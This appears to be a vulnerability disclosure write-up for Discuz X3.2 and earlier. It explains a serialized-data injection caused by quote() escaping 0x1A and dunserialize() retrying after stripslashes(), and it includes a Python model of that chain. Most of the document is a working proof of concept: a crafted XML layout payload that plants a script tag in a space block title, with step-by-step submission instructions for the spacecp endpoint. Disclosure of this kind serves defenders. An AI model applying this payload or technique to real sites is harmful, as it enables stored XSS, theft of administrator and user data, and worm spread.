### Brief description:
First of all, a note: this vulnerability was submitted to the Tencent Security Emergency Response Center on 2014-09-10; that account has since been abandoned, and I have nothing more to say about Tencent.
Problem description:
Discuz_X3.2 and below
Allows stealing administrator and user information, worm attacks, and so on.
### Details:
source\class\discuz\discuz_database.php
```php
public static function quote($str, $noarray = false) {
    if (is_string($str))
        // 0x1A ("\032") is in the escape list, so addcslashes() emits the octal escape \032 for it
        return '\'' . addcslashes($str, "\n\r\\'\"\032") . '\'';
    .....
```
source\function\function_core.php
```php
// Deserialize stored data; if unserialize() fails, retry on a stripslashes()'d copy
function dunserialize($data) {
    if(($ret = unserialize($data)) === false) {
        $ret = unserialize(stripslashes($data));
    }
    return $ret;
}
```
The line `return '\'' . addcslashes($str, "\n\r\\'\"\032") . '\'';` converts ASCII 0x1A into the escape `\032`, which MySQL stores as three characters: ASCII 0x00, 0x33 and 0x32.
Submitting a 0x1A byte therefore makes the `if` in dunserialize() see unserialize() return false, so `$ret = unserialize(stripslashes($data));` is called;
this runs stripslashes() over the data once more, and if the submitted data contains `\` characters the data shifts and overwrites what follows,
for example `a:2:{s:4:"key1";s:4:"\\\\";s:4:"key2";s:4:"data";}` becomes `a:2:{s:4:"key1";s:4:"\\";s:4:"key2";s:4:"data";}`.
If both of these values are user-submittable, then by submitting the right number of `\` characters one can inject into the serialized data and rewrite array values, add array entries, instantiate objects, and so on.
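The transformation chain above, as an added Python model (not Discuz code; each function is a re-implementation of the PHP or MySQL behaviour it is named after, and the layout fields are constructed): quote()'s escaping, MySQL's unescaping on store, and dunserialize()'s stripslashes() retry. It shows that 0x1A comes back from the database as three bytes, that the first unserialize() therefore fails, and that the retry then parses a field which was accepted as an opaque string as serialized structure.

```python
# Added example (not Discuz code): Python model of quote() -> MySQL store -> dunserialize().
import re
ESC = {"\n": "\\n", "\r": "\\r", "\\": "\\\\", "'": "\\'", '"': '\\"', "\x1a": "\\032"}
UNESC = {"0": "\0", "n": "\n", "r": "\r"}          # MySQL string-literal escapes

def php_quote(s):                 # discuz_database::quote(): addcslashes() plus quotes
    return "'" + "".join(ESC.get(c, c) for c in s) + "'"

def mysql_unescape(lit):          # bytes MySQL stores for that literal: \0 -> NUL, \x -> x
    return re.sub(r"\\(.)", lambda m: UNESC.get(m.group(1), m.group(1)), lit[1:-1], flags=re.S)

def stripslashes(s):              # PHP stripslashes(): \\ -> \, \x -> x
    return re.sub(r"\\(.?)", r"\1", s, flags=re.S)

def serialize(v):                 # PHP serialize() for str/dict (ASCII-only sample data)
    if isinstance(v, dict):
        return "a:%d:{%s}" % (len(v), "".join(serialize(k) + serialize(x) for k, x in v.items()))
    return 's:%d:"%s";' % (len(v), v)

def unserialize(data):
    """Minimal PHP unserialize() for s: and a:; returns False on any length mismatch."""
    def parse(i):
        j = data.index(":", i + 2)
        n = int(data[i + 2:j])
        if data[i] == "s" and data[j + 1] == '"' and data[j + 2 + n:j + 4 + n] == '";':
            return data[j + 2:j + 2 + n], j + 4 + n
        if data[i] == "a" and data[j + 1] == "{":
            i, out = j + 2, {}
            for _ in range(n):
                k, i = parse(i)
                v, i = parse(i)
                out[k] = v
            if data[i] == "}":
                return out, i + 1
        raise ValueError("malformed")
    try:
        return parse(0)[0]
    except (ValueError, IndexError, TypeError):
        return False

def dunserialize(data):           # Discuz dunserialize(): retry after stripslashes()
    ret = unserialize(data)
    return unserialize(stripslashes(data)) if ret is False else ret

def demo():
    # Constructed fields: 'text' is a backslash run, 'href' an opaque string on the way in,
    # 'mark' is 0x1A plus three backslashes (the write-up's "1A5c5c5c") so it re-parses cleanly.
    inj = 's:5:"title";s:15:"bypassed-filter";s:3:"pad";s:22:"'
    submitted = {"text": "\\" * 38, "href": '";' + inj, "mark": "\x1a" + "\\" * 3}
    stored = mysql_unescape(php_quote(serialize(submitted)))   # what the DB holds
    return unserialize(stored), dunserialize(stored)  # False, then a different structure
```

The first result is false because the stored `mark` value is two bytes longer than its declared length; the second result has no `href` key at all but a `title` key that was never submitted as one.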
### Proof of vulnerability:
An XSS in the personal space (home) follows.
Rewrite the value of the `$blockdata['parameters'][$blockname]['title']` parameter through the layout array to bypass the filter:
<?xml version="1.0" encoding="ISO-8859-1"?><root>
<item id="diypage">
<item id="frame`frame1">
<item id="attr">
<item id="name"><![CDATA[frame1]]></item>
<item id="moveable"><![CDATA[false]]></item>
<item id="className"><![CDATA[frame cl]]></item>
<item id="titles"></item></item>
<item id="column`frame1_left">
<item id="attr">
<item id="name"><![CDATA[frame1_left]]></item>
<item id="className"><![CDATA[z column]]></item></item>
<item id="block`profile">
<item id="attr">
<item id="name"><![CDATA[profile]]></item>
<item id="className"><![CDATA[block move-span]]></item>
<item id="titles">
<item id="0">
<item id="text"><![CDATA[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]]></item>
<item id="href"><![CDATA[";s:4:"href";s:0:"";s:5:"color";s:11:" !
important";s:5:"float";s:0:"";s:6:"margin";s:0:"";s:9:"font-
size";s:0:"";s:9:"className";s:0:"";s:3:"src";s:0:"";}s:9:"className";a:1:{i:0;s:16:"blocktitle title";}
s:5:"style";s:0:"";}}}s:11:"block`album";a:1:{s:4:"attr";a:3:{s:4:"name";s:5:"album";s:9:"className";s:15:"block
move-span";s:6:"titles";a:3:{i:0;a:8:{s:4:"text";s:4:"相册";s:4:"href";s:0:"";s:5:"color";s:11:" !
important";s:5:"float";s:0:"";s:6:"margin";s:0:"";s:9:"font-
size";s:0:"";s:9:"className";s:0:"";s:3:"src";s:0:"";}s:9:"className";a:1:{i:0;s:16:"blocktitle title";}
s:5:"style";s:0:"";}}}}s:20:"column`frame1_center";a:1:{s:4:"attr";a:2:
{s:4:"name";s:13:"frame1_center";s:9:"className";s:8:"z column";}}s:19:"column`frame1_right";a:1:{s:4:"attr";a:2:
{s:4:"name";s:12:"frame1_right";s:9:"className";s:8:"z column";}}}}
s:13:"currentlayout";s:5:"1:2:1";s:10:"parameters";a:2:{s:7:"profile";a:2:{s:5:"title";s:30:"<script>alert
("xss");</script>";s:9:"banavatar";s:6:"middle";}s:5:"album";a:2:{s:5:"title";s:4:"相册";s:7:"shownum";i:8;}}}]]
></item>
<item id="color"><![CDATA[ !important]]></item>
<item id="float"><![CDATA[]]></item>
<item id="margin"><![CDATA[]]></item>
<item id="font-size"><![CDATA[]]></item>
<item id="className"><![CDATA[]]></item>
<item id="src"><![CDATA[]]></item></item>
<item id="className">
<item id="0"><![CDATA[blocktitle title]]></item></item>
<item id="style"></item></item></item></item>
<item id="block`album">
<item id="attr">
<item id="name"><![CDATA[album]]></item>
<item id="className"><![CDATA[block move-span]]></item>
<item id="titles">
<item id="0">
<item id="text"><![CDATA[相册]]></item>
<item id="href"><![CDATA[http://]]></item>
<item id="color"><![CDATA[ !important]]></item>
<item id="float"><![CDATA[]]></item>
<item id="margin"><![CDATA[]]></item>
<item id="font-size"><![CDATA[]]></item>
<item id="className"><![CDATA[]]></item>
<item id="src"><![CDATA[]]></item></item>
<item id="className">
<item id="0"><![CDATA[blocktitle title]]></item></item>
<item id="style"></item></item></item></item></item>
<item id="column`frame1_center">
<item id="attr">
<item id="name"><![CDATA[frame1_center]]></item>
<item id="className"><![CDATA[z column]]></item></item></item>
<item id="column`frame1_right">
<item id="attr">
<item id="name"><![CDATA[frame1_right]]></item>
<item id="className"><![CDATA[z column]]></item></item></item></item></item></root>
home.php?mod=spacecp&ac=index
1. URL-encode the XML layout above as layoutdata and submit it via POST
2. Space homepage, Decorate space, Edit the album block, Block name: enter ASCII "1A5c5c5c" (the bytes inside the quotes) and confirm
3. Edit again and confirm (no changes needed)
Finally, save the space
![图片1.jpg](https://images.seebug.org/upload/201409/131019039bea24aeed24012061169efeeea29ac9.jpg)
![图片2.jpg](https://images.seebug.org/upload/201409/1310193020955534f941371e0ab9f08201917066.jpg)
![图片3.jpg](https://images.seebug.org/upload/201409/13101944bf1a3f37dd0d0ec15847c37c89f10e46.jpg)
![图片4.jpg](https://images.seebug.org/upload/201409/131019587d8ff92deeec5bf5d536731c8d7c2b90.jpg)